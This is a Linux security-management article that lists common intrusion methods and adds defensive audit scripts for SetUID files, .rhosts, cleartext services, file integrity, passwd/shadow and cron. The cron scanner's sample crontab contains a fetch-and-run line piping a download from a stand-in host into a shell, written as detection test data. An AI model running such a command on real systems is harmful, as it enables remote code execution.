There is no absolutely secure system in the world. Even a stable Linux system is widely considered to have shortcomings in management and security. We expect the system to run at minimum risk, which requires stronger management of system security. To help enterprises understand and master how to strengthen the security management of Linux systems, they need not only to do the preventive work in advance but also to understand common hacker techniques.
Next, we introduce how to strengthen the security management of Linux systems from two aspects: hacker intrusion attacks on Linux, and security protection for Linux systems.
Prevent hacker intrusion
Before discussing the security management of hacker intrusion, I would like to briefly introduce the main ways and techniques hackers use to attack Linux hosts, so that you understand their methods. In this way we can better prevent problems before they happen and take proper security measures.
To prevent malicious intrusion, you can reduce the connections between the intranet and external networks, or even isolate it from other network systems entirely. Although this causes inconvenience in network usage, it is also the most effective preventive measure.
Hackers generally use the following methods to probe Linux or Unix hosts until they find a target that is easy to intrude into, and then begin the intrusion.
Common attack methods are as follows:
1. Obtain the root password directly by eavesdropping, or obtain the password of a special user (who may be root); failing that, obtain the password of any user, because a general user's password is usually easy to obtain.
2. Hackers often use common words to crack passwords. An American hacker once said that with the word "password" alone, most computers in the United States can be opened. Other commonly used words include: account, ald, alpha, beta, computer, dead, demo, dollar, games, bod, hello, help, intro, kill, love, no, OK, okay, please, sex, secret, superuser, system, test, work, and yes.
3. Use commands to learn the user names on the computer, find these users, and through easy-to-crack accounts obtain the system password file /etc/passwd. Then use a password dictionary file and a password-guessing tool to guess the root password.
4. Plant a SetUID file in the /tmp directory, or get the root user to execute a SetUID program, to create a security hole.
5. Exploit a security vulnerability in a program on the system that requires SetUID root permission, for example pppd, to obtain root permission.
6. Intrusion via .rhosts. When an rlogin logon is performed, the rlogin program checks the hosts and accounts defined in .rhosts, and logon from those requires no password.
7. Modify the user's shell configuration files such as .login, .cshrc, and .profile to add destructive programs; the user only needs to log on for them to run.
8. Once the user logs on to the system, a backdoor program (it may be a cracking program) runs without the user's knowledge. It damages the system or provides further system information that facilitates the hacker's penetration into the system.
9. Even if a company's important hosts are protected by layers of network firewalls, a hacker sometimes finds any host on the subnet that is easy to intrude into, and then slowly works toward the important host. For example, if NIS is used for network connections, remote commands can be used to log on without a password, which makes it easy for hackers to get started.
10. The hacker goes online through an intermediate host and from there reaches the target, to avoid being caught by reverse lookup.
11. There are several ways for a hacker to access the host: through Telnet (port 23), Sendmail (port 25), FTP (port 21), or WWW (port 80). Although a host has only one address, it may provide multiple services at the same time, and these ports are a good way for hackers to "enter" the host.
12. Hackers usually use NIS and NFS to intercept information. With simple commands, remote hosts automatically report the services they provide. When such information is intercepted, even if security protection software is installed, the file system on the NIS server is "borrowed" without the administrator knowing, and /etc/passwd leaks out.
13. Send an e-mail to the anonymous account, obtain the /etc/passwd password file from the FTP site, or directly download the passwd file from the FTP site's /etc directory.
14. Network eavesdropping: use a sniffer program to monitor network packets and capture the initial session information of Telnet, FTP, and rlogin, from which the root password can be intercepted. Sniffers are therefore one of the main causes of illegal Internet intrusion today.
15. Intrude into the host using known system security vulnerabilities. This is quite easy against hosts whose system vulnerabilities have not been repaired.
16. If a hacker intrudes into the computer, the system's Telnet program may be replaced. All users' Telnet session accounts and passwords are then recorded and sent to the hacker by e-mail for further intrusion.
17. The hacker clears system records. Some hackers delete the logon time and IP address from the records.
18. Intruders often replace inspection commands such as ifconfig and tcpdump to avoid detection.
19. The system thief secretly copies /etc/passwd and then uses a dictionary file to crack the passwords.
20. Thieves covet root permission through super-user programs such as su or sudo.
21. Hackers often use buffer overflows to intrude into the system.
22. cron is the tool Linux uses to execute commands automatically, such as regular backups or deletion of expired files. Intruders often use cron to leave backdoors: besides regularly running cracking programs to intrude into the system, it also reduces the risk of being discovered by administrators.
23. Intrude into Linux hosts using IP spoofing (IP fraud) technology.
The above are common tactics hackers use to attack Linux hosts. If hackers can easily intrude into a computer using the above methods, the computer's security is too poor, and you need to download new versions of software to upgrade or use patch files to fix the security vulnerabilities. We hereby warn that unauthorized use of others' computer systems or theft of others' information is illegal, and we hope you will not attempt it.
In addition to the above methods, many hackers also use intrusion tools to attack Linux systems. These tools are often planted on victim servers after intruders have broken in. They have different characteristics: some are simply used to capture user names and passwords, while others are powerful enough to record all network data streams. In short, hackers exploit intrusion tools to attack Linux hosts.
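Items 4, 6 and 7 above all come down to files an intruder leaves behind: a SetUID file in a world-writable directory, a trusting `.rhosts`, or a line appended to a shell startup file. The following audit script is an added example written for this page, not code from the original article; the function names are its own, and it assumes a POSIX shell with `find` supporting `-maxdepth` and `-xdev` (GNU or BSD).

```shell
#!/bin/sh
# Added example (not from the original article): audit the places where items
# 4, 6 and 7 say an intruder plants files. It lists setuid/setgid files sitting
# in world-writable directories, .rhosts lines with a "+" wildcard (any host or
# any user trusted), and shell startup files that run something from /tmp,
# /var/tmp or /dev/shm. All function names are this example's own.

# list_setuid DIR : every setuid or setgid regular file under DIR
list_setuid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# setuid_in_world_writable DIR : setuid/setgid files whose parent directory
# is world-writable (e.g. /tmp); on a clean host this prints nothing
setuid_in_world_writable() {
    list_setuid "$1" | while IFS= read -r f; do
        d=$(dirname "$f")
        # -perm -0002: "other" has write permission on the directory
        if find "$d" -maxdepth 0 -perm -0002 | grep -q .; then
            printf '%s\n' "$f"
        fi
    done
}

# rhosts_wildcards HOME_ROOT : "<file>: <line>" for every .rhosts line under
# HOME_ROOT (e.g. /home) that contains a bare "+" field
rhosts_wildcards() {
    find "$1" -maxdepth 2 -name .rhosts -type f 2>/dev/null | while IFS= read -r f; do
        grep -v '^[[:space:]]*#' "$f" \
            | grep -E '(^|[[:space:]])[+]([[:space:]]|$)' \
            | while IFS= read -r line; do printf '%s: %s\n' "$f" "$line"; done
    done
}

# startup_file_refs HOME_ROOT : startup-file lines that reference a
# world-writable directory, printed as file:line-number:text (the /dev/null
# argument makes grep prefix the file name even for a single file)
startup_file_refs() {
    find "$1" -maxdepth 2 -type f \
        \( -name .profile -o -name .login -o -name .cshrc \
           -o -name .bashrc -o -name .bash_profile \) 2>/dev/null \
    | while IFS= read -r f; do
        grep -nE '(/tmp|/var/tmp|/dev/shm)/' "$f" /dev/null || true
    done
}

# Run all three checks against the usual locations when invoked as "audit"
if [ "$1" = "audit" ]; then
    echo "== setuid files in world-writable directories"
    for d in /tmp /var/tmp /dev/shm; do setuid_in_world_writable "$d"; done
    echo "== .rhosts wildcards"
    rhosts_wildcards /home; rhosts_wildcards /root
    echo "== startup files referencing world-writable directories"
    startup_file_refs /home; startup_file_refs /root
fi
```

Run it as root with the `audit` argument so that other users' home directories are readable; a non-empty result from any of the three checks is worth investigating, and the `.rhosts` check is also a reminder that the r-services themselves are best left disabled.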
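Items 11, 12 and 14 concern services that either log users on in cleartext (Telnet, FTP, rlogin) or expose file-system and account data (NIS, NFS), and the sniffer that profits from them. The following script is an added example written for this page, not code from the original article: it parses `ss -ltn` and `ip link` output to flag such listeners and any interface in promiscuous mode. The port table, the function names and the sample output are this example's own constructions.

```shell
#!/bin/sh
# Added example (not from the original article): find the cleartext and
# trust-based services named in items 11, 12 and 14 among a host's listening
# ports, and find network interfaces in promiscuous mode, which is what a
# sniffer needs. Both functions parse text on stdin so they work on live
# output ("ss -ltn", "ip link") or on a saved copy. The port table, function
# names and sample output are this example's own.

# Legacy service ports and why each matters, one "port reason" per line
RISKY_PORTS='21 ftp-cleartext-logon
23 telnet-cleartext-logon
111 rpcbind-used-by-nis-and-nfs
513 rlogin-rhosts-trust
514 rsh-rhosts-trust
2049 nfs-export'

# risky_listeners < ss-ltn-output : "port reason" for each LISTEN socket whose
# local port is in RISKY_PORTS; field 4 is "address:port" as ss prints it
risky_listeners() {
    awk -v table="$RISKY_PORTS" '
        BEGIN {
            n = split(table, rows, "\n")
            for (i = 1; i <= n; i++) {
                split(rows[i], kv, " ")
                reason[kv[1]] = kv[2]
            }
        }
        $1 == "LISTEN" {
            port = $4
            sub(/.*:/, "", port)        # keep only the text after the last colon
            if (port in reason) print port, reason[port]
        }'
}

# promisc_ifaces < ip-link-output : interface names whose flag list has PROMISC
promisc_ifaces() {
    awk -F': ' '/<[^>]*PROMISC[^>]*>/ { print $2 }'
}

# Constructed sample output (not captured from a real host) for a stand-alone run
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
LISTEN 0      128    0.0.0.0:23         0.0.0.0:*
LISTEN 0      5      127.0.0.1:25       0.0.0.0:*
LISTEN 0      128    [::]:2049          [::]:*'
SAMPLE_IP='1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP'

echo "== risky listeners (sample)"
printf '%s\n' "$SAMPLE_SS" | risky_listeners
echo "== promiscuous interfaces (sample)"
printf '%s\n' "$SAMPLE_IP" | promisc_ifaces
# On a live host: ss -ltn | risky_listeners ; ip link | promisc_ifaces
```

A port showing up here is a prompt to replace the service with an encrypted equivalent (SSH in place of Telnet, rlogin and FTP) or to firewall it to the hosts that need it; a PROMISC flag on an interface that is not running an authorised capture tool deserves immediate attention.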
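Items 17 and 18 describe an intruder erasing records and swapping the very commands an administrator would use to look for them, so the administrator needs a reference that was taken before the compromise. The script below is an added example written for this page, not code from the original article: a minimal SHA-256 manifest that is created while the host is known-good and verified later. It assumes `sha256sum` from GNU coreutils; the function names are its own.

```shell
#!/bin/sh
# Added example (not from the original article): a minimal integrity baseline
# against the tampering in items 17 and 18. Record SHA-256 digests of the
# inspection commands while the host is known-good, keep the manifest on
# read-only or off-host storage, and compare later: a replaced ifconfig or
# tcpdump shows up as CHANGED. Uses sha256sum from GNU coreutils; function
# names are this example's own.

# file_hash FILE : SHA-256 hex digest of FILE
file_hash() {
    sha256sum "$1" | cut -d ' ' -f 1
}

# baseline_make FILE... : write one "digest<TAB>path" line per file to stdout
baseline_make() {
    for f in "$@"; do
        printf '%s\t%s\n' "$(file_hash "$f")" "$f"
    done
}

# baseline_verify MANIFEST : print "CHANGED<TAB>path" or "MISSING<TAB>path" for
# each entry that no longer matches; returns 1 if anything was reported
baseline_verify() {
    status=0
    while IFS="$(printf '\t')" read -r expected path; do
        if [ ! -f "$path" ]; then
            printf 'MISSING\t%s\n' "$path"; status=1
        elif [ "$(file_hash "$path")" != "$expected" ]; then
            printf 'CHANGED\t%s\n' "$path"; status=1
        fi
    done < "$1"
    return "$status"
}

# Typical use (paths vary by distribution; store the manifest off the host):
#   baseline_make /sbin/ifconfig /usr/sbin/tcpdump /bin/ps /bin/ls > /mnt/usb/manifest
#   baseline_verify /mnt/usb/manifest
```

The manifest is only as trustworthy as the `sha256sum` binary that verifies it, so a serious deployment runs the check from read-only media or a known-clean system. For the record clearing in item 17, the matching countermeasure is to forward logs to a separate host as they are written, so that deleting the local copy leaves the remote one intact.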
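Items 3, 12, 13 and 19 all end with a copy of `/etc/passwd` being run through a dictionary. Whether that copy is worth anything depends on the file's contents, which the following audit checks. It is an added example written for this page, not code from the original article; the function names and the sample file are its own, and the hash-like string in the sample is a placeholder, not a real hash.

```shell
#!/bin/sh
# Added example (not from the original article): audit the password file that
# items 3, 12, 13 and 19 describe hackers copying. When shadow passwords are in
# use, field 2 of each /etc/passwd entry is "x" (or "*" / "!..." for a locked
# account), so a copied passwd file holds nothing a dictionary attack can work
# on; the real hashes live in /etc/shadow, which must not be world-readable.
# The checks also flag empty passwords and extra UID-0 accounts, which give
# root permission without going through su or sudo. Function names and the
# sample file are this example's own; the hash in it is a placeholder.

# passwd_exposed_hashes < passwd : user names whose password field holds a
# hash instead of a shadow marker
passwd_exposed_hashes() {
    awk -F: '$2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print $1 }'
}

# passwd_empty_passwords < passwd : user names that can log on with no password
passwd_empty_passwords() {
    awk -F: '$2 == "" { print $1 }'
}

# passwd_extra_uid0 < passwd : accounts other than root whose UID is 0
passwd_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# shadow_perm_issue FILE : prints FILE when "other" can read it (should be silent)
shadow_perm_issue() {
    find "$1" -maxdepth 0 -perm -0004 2>/dev/null
}

# Constructed sample passwd file (not from a real host)
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
legacy:$6$PLACEHOLDER$notarealhash:1001:1001::/home/legacy:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
toor:x:0:0::/root:/bin/bash'

echo "== hashes exposed in passwd:";  printf '%s\n' "$SAMPLE_PASSWD" | passwd_exposed_hashes
echo "== empty passwords:";           printf '%s\n' "$SAMPLE_PASSWD" | passwd_empty_passwords
echo "== extra UID-0 accounts:";      printf '%s\n' "$SAMPLE_PASSWD" | passwd_extra_uid0
# On a live host: passwd_exposed_hashes < /etc/passwd ; shadow_perm_issue /etc/shadow
```

On the sample, `legacy` is the account whose hash would be exposed to an offline dictionary attack, `guest` logs on with no password at all, and `toor` is a second UID-0 account. On a real host, `pwconv` moves any remaining hashes into `/etc/shadow`, and the shadow file should be owned by root with no read permission for others.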
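Item 22 singles out cron as a place to hide a backdoor, because a job there survives reboots and runs without anyone logging on. The script below is an added example written for this page, not code from the original article: it scans crontab text for jobs that run from world-writable or hidden directories or pipe fetched text into a shell, and checks that system cron files cannot be modified by non-root users. The function names, the heuristics and the sample crontab are this example's own constructions.

```shell
#!/bin/sh
# Added example (not from the original article): audit cron for the backdoors
# item 22 describes. suspicious_cron_lines scans crontab text (the output of
# "crontab -l", or a file from /etc/cron.d) for jobs that run from a
# world-writable or hidden directory or pipe downloaded text into a shell;
# cron_writable_files lists system cron files that group or others can
# modify. Names, heuristics and the sample crontab are this example's own.

# suspicious_cron_lines < crontab-text : non-comment lines that match any of
#   - a path under /tmp, /var/tmp or /dev/shm
#   - a hidden directory component such as /.sys/
#   - output piped into sh, bash, dash or zsh
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' \
    | grep -E '(/tmp|/var/tmp|/dev/shm)/|/\.[^/[:space:]]+/|[|][[:space:]]*(ba|da|z)?sh([[:space:]]|$)'
}

# cron_writable_files DIR : files in DIR (e.g. /etc/cron.d) writable by group or others
cron_writable_files() {
    find "$1" -maxdepth 1 -type f \( -perm -0020 -o -perm -0002 \) 2>/dev/null
}

# all_crontabs : every readable system and per-user crontab (per-user spools
# need root), each line prefixed with its source, for a whole-host scan
all_crontabs() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -r "$f" ] && sed "s|^|$f: |" "$f"
    done
    return 0
}

# Constructed sample crontab (not from a real host)
SAMPLE_CRONTAB='# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.sys/update >/dev/null 2>&1
30 1 * * * /usr/bin/find /var/log -name "*.gz" -mtime +30 -delete
0 * * * * wget -qO- http://example.invalid/x | sh'

echo "== suspicious lines in the sample crontab"
printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron_lines
# On a live host (as root): all_crontabs | suspicious_cron_lines ; cron_writable_files /etc/cron.d
```

The pattern list is deliberately short and will miss a job that hides behind an innocuous-looking path, so pair it with the integrity-baseline idea: hash the cron spool and `/etc/cron.d` contents once and alert on any change, rather than trying to recognise every possible backdoor by its text.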